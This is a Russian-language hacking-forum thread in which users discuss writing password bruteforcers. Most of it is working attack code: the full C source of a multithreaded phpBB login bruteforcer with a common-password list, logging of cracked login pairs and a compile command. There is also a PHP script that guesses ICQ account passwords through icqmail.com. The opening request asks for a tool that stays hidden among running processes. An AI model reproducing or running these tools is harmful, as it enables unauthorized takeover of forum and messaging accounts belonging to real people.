Народ, вот хочу написать свой брутофорсер, что для этого надо, кроме мозгов и прямых рук?) Ссылки там дайти на статьи и тому подобное, которые хоть немного упростят мне это нелегкое дело. Буду признателен...
Да хотя бы на перлухи, главное чтоб имел консольное или удалённое управление и висел в процессах, брут должен уметь перебирать get и post, icq хотелось бы ещё, но для меня это будет слишком сложновато. Странно что в инете мало распостранены такие бруты, вот пришёл к выводу что легче будет наверно написать свой. ПИСИ: Есть у меня один скриптик на перлухе, но он недоделанный, кому не лень разобраться в нём могу скинуть...
Мой старый брут phpBB, иногда пользуюсь на шеллах (максимальный результат - 30 паролей в сек) Собирать gcc -l pthread -l curses pbf.c -o pbf Code: /* (C) KEZ <[email protected]> */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <getopt.h> #include <netdb.h> #include <pthread.h> #include <time.h> #include <curses.h> #include <signal.h> #include <getopt.h> #define PHPBB_CHECKPAIR_FORUMERROR -6 #define PHPBB_CHECKPAIR_UNKNOWNRESPONSE -5 #define PHPBB_CHECKPAIR_FORBIDDEN -4 #define PHPBB_CHECKPAIR_NOTFOUND -3 #define PHPBB_CHECKPAIR_SHAREERROR -2 #define PHPBB_CHECKPAIR_CONNECTERROR -1 #define PHPBB_CHECKPAIR_GOOD 0 #define PHPBB_CHECKPAIR_BAD 1 #define PHPBB_GETNEXTPAIR_FILEERROR -1 #define PHPBB_GETNEXTPAIR_EOF 0 #define PHPBB_GETNEXTPAIR_OK 1 #define PHPBB_PASSWORD_LEN 32 #define PHPBB_LOGIN_LEN 25 #define PHPBB_PAIR_LEN PHPBB_PASSWORD_LEN + PHPBB_LOGIN_LEN + 3 #define PHPBB_PATH_LEN 256 #define PHPBB_RESPONSEBUF_LEN 1024 #define MAX_THREADS 300 typedef struct { char *hostname; unsigned int port; char *ip; char *path; int threads; char *listfile; char *logfile; bool single; bool curses; } prog_options; FILE *phpbb_listfile; FILE *phpbb_logfile; pthread_t threads[MAX_THREADS]; pthread_t crefresh_thread; pthread_mutex_t print_mutex = PTHREAD_MUTEX_INITIALIZER; bool stop_brute = 0; prog_options prog; int curr_pass = -1; char curr_login[PHPBB_LOGIN_LEN]; time_t start_time; time_t stop_time; time_t elapsed_time; unsigned int count_checked = 0; unsigned int count_good = 0; float speed = 0; char tmplogin[PHPBB_LOGIN_LEN]; char copyright[] = "(C) KEZ 2005"; char logo[] = "PHPBB BRUTEFORCE"; /* common passwords list */ char *common_passwords[] = { "123", "1234", "12345", "123456", "1234567", "12345678", "87654321", "7654321", "654321", "54321", "4321", "321", "21", "q", "qw", "qwe", "qwer", "qwert", "qwerty", "qwerty", "ytrewq", "trewq", "rewq", "ewq", "wq", "1111", "111", "2222", "222", "3333", "333", "4444", "444", "5555", "555", "6666", "666","7777", "777", "8888", "888", "9999", "999", "101010", "202020", "303030", "404040", "505050", "606060", "707070", "808080", "909090", "000000", "102030", "302010", "666666", "112233", "111222333", "q1w2e3", "pass", "password", "passpass" }; /* PHP explode() analog */ int explode( char *pair, char separator, char *s1, char *s2 ) { int separator_position; if (!pair || !s1 || !s2 ) return 0; if (!separator) separator = ';'; separator_position = strchr( pair, separator ) - pair + 1; if (!separator_position || separator_position < 0) return 0; snprintf( s1, separator_position, "%s", pair ); snprintf( s2, strlen( pair ), "%s", pair + separator_position ); return 1; } /* Perl chomp() analog */ int chomp( char *s ) { if (!s) return -1; if (strstr( s, "\r" ) ) memset( (char*)strstr( s, "\r" ), 0, 1 ); if (strstr( s, "\n" ) ) memset( (char*)strstr( s, "\n" ), 0, 1 ); } /* DNS resolver */ char *GetIP( char* hostname ) { struct hostent *he; struct in_addr in; he = gethostbyname( hostname ); if (!he) return NULL; memcpy( &in.s_addr, he->h_addr, he->h_length ); return (char*)inet_ntoa( in ); } /* login-password pair checker */ int phpbb_checkpair( char *ip, unsigned int port, char *hostname, char *path, char *login, char *password ) { int s; struct sockaddr_in s_a; char *request; char response[PHPBB_RESPONSEBUF_LEN]; int request_length; int content_length; if (!ip || !hostname || !login || !password || !path) return PHPBB_CHECKPAIR_SHAREERROR; if (strlen( path ) > PHPBB_PATH_LEN) return PHPBB_CHECKPAIR_SHAREERROR; s = socket( AF_INET, SOCK_STREAM, 0 ); if (!s) return PHPBB_CHECKPAIR_SHAREERROR; if (inet_addr( prog.ip ) == -1) return PHPBB_CHECKPAIR_SHAREERROR; s_a.sin_family = AF_INET; s_a.sin_port = htons( prog.port ); s_a.sin_addr.s_addr = inet_addr( prog.ip ); if (connect( s, (struct sockaddr*)&s_a, sizeof( s_a ) ) < 0) return PHPBB_CHECKPAIR_CONNECTERROR; content_length = 42 + strlen( login ) + strlen( password ); request_length = 125 + strlen( hostname ) * 2 + strlen( path ) + content_length; request = (char*)malloc( request_length ); sprintf( request, "POST http://%s%slogin.php HTTP/1.1\n" "Content-Type: application/x-www-form-urlencoded\n" "Connection: Close\n" "Host: %s\n" "Content-Length: %d\n" "\n" "username=%s&password=%s&redirect=&login=Log+in" "\n", hostname, path, hostname, content_length, login, password ); if (send( s, request, request_length, 0 ) < 0) return PHPBB_CHECKPAIR_CONNECTERROR; free( request ); if (recv( s, response, PHPBB_RESPONSEBUF_LEN, 0 ) < 0) return PHPBB_CHECKPAIR_CONNECTERROR; close( s ); if (!strncmp( response+9, "404", 3 )) return PHPBB_CHECKPAIR_NOTFOUND; if (!strncmp( response+9, "403", 3 )) return PHPBB_CHECKPAIR_FORBIDDEN; if (strncmp( response+9, "200", 3 ) && strncmp( response+9, "302", 3 )) return PHPBB_CHECKPAIR_UNKNOWNRESPONSE; if (strstr( response, "phpBB : <b>Critical Error</b>" )) return PHPBB_CHECKPAIR_FORUMERROR; if (strstr( response, "Location: http://" )) return PHPBB_CHECKPAIR_GOOD; else return PHPBB_CHECKPAIR_BAD; } /* listfile fopen() */ int phpbb_openlistfile( char *filename ) { if (!filename) return -1; if (phpbb_listfile) return -1; phpbb_listfile = fopen( filename, "r" ); if (!phpbb_listfile) return 0; return 1; } /* listfile close() */ int phpbb_closelistfile( void ) { close( phpbb_listfile ); return 1; } /* logfile fopen() */ int phpbb_openlogfile( char *filename ) { if (!filename) return -1; if (phpbb_logfile) return -1; phpbb_logfile = fopen( filename, "w" ); if (!phpbb_logfile) return 0; return 1; } /* logfile close() */ int phpbb_closelogfile( void ) { close( phpbb_logfile ); return 1; } /* add message to log */ int putlog( char *s ) { if (!phpbb_logfile) return -1; fputs( s, phpbb_logfile ); fflush( phpbb_logfile ); } /* read next pair from list file */ int phpbb_getnextpair( char *pair ) { char BUF[1024]; if (prog.single == 1) { if (!common_passwords[curr_pass]) { curr_pass = 0; if (ferror( phpbb_listfile )) return PHPBB_GETNEXTPAIR_FILEERROR; if (!fgets( curr_login, PHPBB_LOGIN_LEN, phpbb_listfile )) { if (feof( phpbb_listfile )) return PHPBB_GETNEXTPAIR_EOF; if (ferror( phpbb_listfile )) return PHPBB_GETNEXTPAIR_FILEERROR; } if (!strstr( curr_login, "\n" )) fgets( BUF, 1024, phpbb_listfile ); else chomp( curr_login ); } sprintf( pair, "%s;%s", curr_login, common_passwords[curr_pass] ); curr_pass++; return PHPBB_GETNEXTPAIR_OK; } if (!phpbb_listfile) return PHPBB_GETNEXTPAIR_FILEERROR; if (!fgets( pair, PHPBB_PAIR_LEN, phpbb_listfile )) { if (feof( phpbb_listfile )) return PHPBB_GETNEXTPAIR_EOF; if (ferror( phpbb_listfile )) return PHPBB_GETNEXTPAIR_FILEERROR; } if (!strstr( pair, "\n" )) fgets( BUF, 1024, phpbb_listfile ); else chomp( pair ); return PHPBB_GETNEXTPAIR_OK; } /* curses thread number print */ void PrintCursesThreadNumber( int thread_num ) { char msg[80]; int i; memset( msg, ' ', 80 ); sprintf( msg, "%d)", thread_num ); move( 4 + thread_num, 0 ); standout(); addstr( msg ); standend(); } /* bruting thread */ void *phpbb_brutethread( void* parameter ) { char pair[PHPBB_PAIR_LEN]; char login[PHPBB_LOGIN_LEN]; char password[PHPBB_PASSWORD_LEN]; int i; char msg[80]; int thread_num = (int)parameter; if (!prog.curses) printf( " [INFO] [Thread #%d] <SPAWNED>\n", thread_num ); while (1) { if (prog.curses) { pthread_mutex_lock( &print_mutex ); PrintCursesThreadNumber( thread_num ); pthread_mutex_unlock( &print_mutex ); } if (stop_brute) { if (!prog.curses) printf( " [INFO] [Thread #%d] <KILLED>\n", thread_num ); pthread_exit( 0 ); } switch (phpbb_getnextpair( pair )) { case PHPBB_GETNEXTPAIR_OK: memset( login, 0, PHPBB_LOGIN_LEN ); memset( password, 0, PHPBB_PASSWORD_LEN ); if (!explode( pair, ';', login, password )) { if (!prog.curses) printf( " [INFO] [Thread #%d] WRONG LISTFILE FORMAT\n",thread_num ); stop_brute = 1; continue; } if (prog.curses) { pthread_mutex_lock( &print_mutex ); move( 4 + thread_num, 6 ); sprintf( msg, "%s;%s\0", login, password ); addstr( msg ); for (i = 0; i <= 80 - strlen( msg ); i++) addch( ' ' ); pthread_mutex_unlock( &print_mutex ); } switch (phpbb_checkpair( prog.ip, prog.port, prog.hostname, prog.path, login, password )) { case PHPBB_CHECKPAIR_GOOD: if (!prog.curses) printf( " [INFO] [Thread #%d] GOOD PAIR: %s;%s\n", thread_num, login, password ); count_good++; putlog( "LOGIN: " ); putlog( login ); putlog( " PASSWORD: " ); putlog( password ); putlog( "\n" ); break; case PHPBB_CHECKPAIR_BAD: if (!prog.curses) printf( " [INFO] [Thread #%d] BAD PAIR: %s;%s\n", thread_num, login, password ); break; case PHPBB_CHECKPAIR_SHAREERROR: endwin(); printf( " [ERROR] [Thread #%d] SHARE ERROR\n", thread_num ); stop_brute = 1; break; case PHPBB_CHECKPAIR_CONNECTERROR: endwin(); printf( " [ERROR] [Thread #%d] CONNECTION FAILED\n", thread_num ); stop_brute = 1; break; case PHPBB_CHECKPAIR_UNKNOWNRESPONSE: endwin(); printf( " [ERROR] [Thread #%d] UNKNOW SERVER RESPONSE\n", thread_num ); stop_brute = 1; break; case PHPBB_CHECKPAIR_FORBIDDEN: endwin(); printf( " [ERROR] [Thread #%d] FORBIDDEN\n", thread_num ); stop_brute = 1; break; case PHPBB_CHECKPAIR_NOTFOUND: endwin(); printf( " [ERROR] [Thread #%d] NOT FOUND\n", thread_num ); stop_brute = 1; break; case PHPBB_CHECKPAIR_FORUMERROR: endwin(); printf( " [ERROR] [Thread #%d] REMOTE ERROR\n", thread_num ); stop_brute = 1; break; default: break; } count_checked++; continue; case PHPBB_GETNEXTPAIR_FILEERROR: endwin(); printf( " [ERROR] [Thread #%d] LISTFILE READ ERROR\n", thread_num ); stop_brute = 1; break; case PHPBB_GETNEXTPAIR_EOF: endwin(); printf( " [INFO] [Thread #%d] EOF\n", thread_num ); stop_brute = 1; continue; default: break; } } return NULL; } /* statistics */ void Stats( void ) { elapsed_time = stop_time - start_time; if (elapsed_time && count_checked) speed = (float)count_checked / (float)elapsed_time; else speed = 0; printf( "[STATS]\n" ); printf( "Time started : %s", ctime( &start_time ) ); printf( "Time finished : %s", ctime( &stop_time ) ); printf( "Elapsed : %d seconds\n", stop_time - start_time ); printf( "Checked : %d pairs\n", count_checked ); printf( "Good : %d pairs\n", count_good ); printf( "Speed : %f pairs/second\n", speed ); printf( "\n" ); } /* usage */ void Usage( char *s ) { printf( "Usage: ./prog -h host [-s port] [-p path] -l listfile\n" ); printf( " [-t threads] [-o outfile] [-P] [-C]\n\n" ); printf( " host : phpBB hostname or IP address\n" ); printf( " port : web server port, 80 by default\n" ); printf( " path : remote path, where phpBB located, ""/"" by default\n" ); printf( " listfile : file with login;password pairs or single login,\n " " if -P specified\n" ); printf( " threads : number of threads, 1 by default\n" ); printf( " outfile : write bruted pairs to this file, /dev/null by default\n" ); printf( " -P : use common passwords. -l options = single LOGIN\n" ); printf( " -C : use curses lib. graphical output\n" ); printf( "\n" ); if (s) printf( "------- %s-------\n", s ); exit( 0 ); } /* SIGINT handler */ void sigint_catch( int signo ) { if (!stop_brute) { stop_brute = 1; if (!prog.curses) printf( "[INFO] [SIGINT Handler] INTERRUPT (Ctrl+C)\n", signo ); } } /* config print */ void PrintCursesConfig( void ) { char msg[1024]; if (!prog.curses) { printf( "\n[SETTINGS]\n" ); printf( " HOST : %s\n", prog.hostname ); printf( " IP : %s\n", prog.ip ); printf( " PORT : %d\n", prog.port ); printf( " PATH : %s\n", prog.path ); printf( " LISTFILE : %s\n", prog.listfile ); printf( " THREADS : %d\n", prog.threads ); if (prog.logfile) printf( " OUTFILE : %s\n", prog.logfile ); printf( " OTHER : " ); if (prog.single) printf( "USE COMMON PASSWORDS " ); if (prog.curses) printf( "USE CURSES OUTPUT" ); if (!prog.single && !prog.curses) printf( "NO" ); printf( "\n\n" ); } else { move( LINES - 6, 2 ); sprintf( msg, "http://%s:%d%s (%s)\n (listfile: %s)" " (outfile: %s) (threads: %d)", prog.hostname, prog.port, prog.path, prog.ip, prog.listfile, prog.logfile, prog.threads); addstr( msg ); } } /* curses logo */ void PrintCursesLogo( void ) { standout(); move( 1, COLS / 2 - strlen( logo ) / 2 ); addstr( logo ); standend(); } /* curses speed */ void PrintCursesSpeed( void ) { char msg[20]; elapsed_time = time( NULL ) - start_time; if (!elapsed_time || !count_checked) return; speed = (float)count_checked/(float)elapsed_time; pthread_mutex_lock( &print_mutex ); memset( msg, 0, 20 ); move( LINES - 7, 2 ); sprintf( msg, "SP %f | EL %u | AL %u | GD %u", speed, elapsed_time/60, count_checked, count_good ); addstr( msg ); pthread_mutex_unlock( &print_mutex ); } /* curses copyright */ void PrintCursesCopyright( void ) { move( LINES - 2, COLS / 2 - strlen( copyright ) / 2 ); addstr( copyright ); } /* curses lib. initialize */ void InitCurses( void ) { initscr(); clear(); PrintCursesLogo(); PrintCursesCopyright(); PrintCursesConfig(); refresh(); } /* refresh screen */ void *CursesRefresh( void *param ) { while (1) { PrintCursesSpeed(); move( LINES - 1, COLS - 1 ); refresh(); } } /* entry point */ int main( int argc, char *argv[] ) { int i; opterr = 0; if (argc < 2) Usage( NULL ); while (i = getopt( argc, argv, "h:s:p:l:t:o:PC" )) { if (i == EOF) break; switch (i) { case 'h': prog.hostname = optarg; break; case 's': prog.port = (unsigned int)atoi( optarg ); break; case 'p': prog.path = optarg; break; case 'l': prog.listfile = optarg; break; case 't': prog.threads = (int)atoi( optarg ); break; case 'o': prog.logfile = optarg; break; case 'P': prog.single = 1; break; case 'C': prog.curses = 1; break; case '?': printf( "Option error - %c\n", optopt ); Usage( NULL ); } } if (!prog.hostname) Usage( "Hostname needed!" ); if (!prog.listfile) Usage( "Listfile needed!" ); if (!prog.logfile) prog.logfile = "/dev/null"; if (!prog.threads) prog.threads = 1; if (!prog.path) prog.path = "/"; if (!prog.port) prog.port = 80; if (inet_addr( prog.hostname ) == -1) prog.ip = GetIP( prog.hostname ); else prog.ip = prog.hostname; if (prog.curses) { InitCurses(); } else { printf( "\nphpBB Bruteforce\n" ); printf( "for education purposes only\n" ); printf( "KEZ <[email protected]> (C) ANTICHAT.RU. CODED IN 2005 YEAR.\n\n" ); } signal( SIGINT, sigint_catch ); signal( SIGCHLD, SIG_IGN ); signal( SIGTERM, SIG_IGN ); signal( SIGSEGV, SIG_IGN ); signal( SIGHUP, SIG_IGN ); signal( SIGPIPE, SIG_IGN ); if (phpbb_openlistfile( prog.listfile ) != 1) { if (prog.curses) endwin(); printf( "[ERROR] [Main Thread] CANNOT OPEN LISTFILE\n\n" ); exit( 0 ); } if (prog.logfile) if (phpbb_openlogfile( prog.logfile ) != 1) { if (prog.curses) endwin(); printf( "[ERROR] [Main Thread] CANNOT OPEN OUTFILE\n\n" ); exit( 0 ); } start_time = time( NULL ); if (prog.curses) pthread_create( &crefresh_thread, NULL, CursesRefresh, NULL ); if (!prog.curses) printf( "[INFO] [Main Thread] CREATING THREADS...\n" ); for (i = 1; i <= prog.threads; i++) { if (!stop_brute) pthread_create( &threads[i], NULL, phpbb_brutethread, (void*)i ); } for (i = 1; i <= prog.threads ; i++) pthread_join( threads[i], NULL ); if (!prog.curses) printf( "[INFO] [Main Thread] ALL THREADS KILLED\n\n" ); stop_time = time( NULL ); endwin(); Stats(); if (!prog.single) phpbb_closelistfile(); if (prog.logfile) phpbb_closelogfile(); }
мош пригодится док по LWP для написания перрловых сплойтов самое оно http://perldoc.narod.ru/LWP-spec.pdf
Кто нибудь может этот код перегнать в perl? Code: <? /*////////////////////////////////////// // ICQ Брутофорс by Zadoxlik // // Идея The FUF // */////////////////////////////////////// ?> <h4>ICQ брутофорс</h4> <form method=post action=""> Аськи с <input type=text name=diap1> по <input type=text name=diap2> <BR>тестим на пасс <input type=text name=pass> <input type=submit value="давай"> </form> <? if(@$diap1 && @$diap2 && @$pass){ //Собственно процесс брутофорса for($i=$diap1; $i<=$diap2; $i++){ $open_host="www.icqmail.com"; $open_port="80"; $main_url2="http://www.icqmail.com/s/icq/reg_icq.asp"; $refer2="http://www.icqmail.com/s/icq/reg_icq.asp"; $host="www.icqmail.com"; $sock = fsockopen($open_host, $open_port, $errno, $errstr, 100); fputs($sock, "POST ".$main_url2." HTTP/1.0\r\n"); fputs($sock, "Host: ".$host."\r\n"); fputs($sock, "Accept: */*\r\n"); fputs($sock, "Accept-Language: ru\r\n"); fputs($sock, "Proxy-Connection: Keep-Alive\r\n"); fputs($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"); fputs($sock, "Referer: ".$refer2."\r\n"); fputs($sock, "Content-Type: application/x-www-form-urlencoded\r\n"); fputs($sock, "Content-Length: 116\r\n"); fputs($sock, "Pragma: no-cache\r\n"); fputs($sock, "Cookie: lang=xx; temp=; domaincode=icq\r\n"); fputs($sock, "\r\n"); fputs($sock, "AltID=".$i."&user=gfsdghfshh&pwd=".$pass."&repwd=".$pass."&firstname=&lastname=&tosagree=on&action=register&xo=\r\n"); fputs($sock, "US\r\n"); fputs($sock, "\r\n"); $u=fread($sock, 100); for($x=0;$x < 900;$x++){ $headers = fgets ($sock, 4096); @$a=$a.$headers;} fclose($sock); @$good=eregi("(We're sorry, your ICQ)", $a); $a="0"; if(!@$good){ $fp=fopen("good.txt","a"); $messaga=$i." - pass: ".$pass."\r\n"; fputs($fp,$messaga); fclose($fp);} } } ?>
...ъХ... этот код не работает т.к. там ввели картинки. А ссылки если на перле и т.д. не могу дать а вот если на делфи то про потоки почитай и напишешь без проблем http://gurin.tomsknet.ru/delphithreads.html вот это например
Zadoxlik может подскажеш где в скрите указывать номера ICQ для брута, и путь к словарю или пасс, я так по скрипту глазами пробижалься, что то не нашёл, и интерестно есть ли аналог такого скрипта только на перловки?
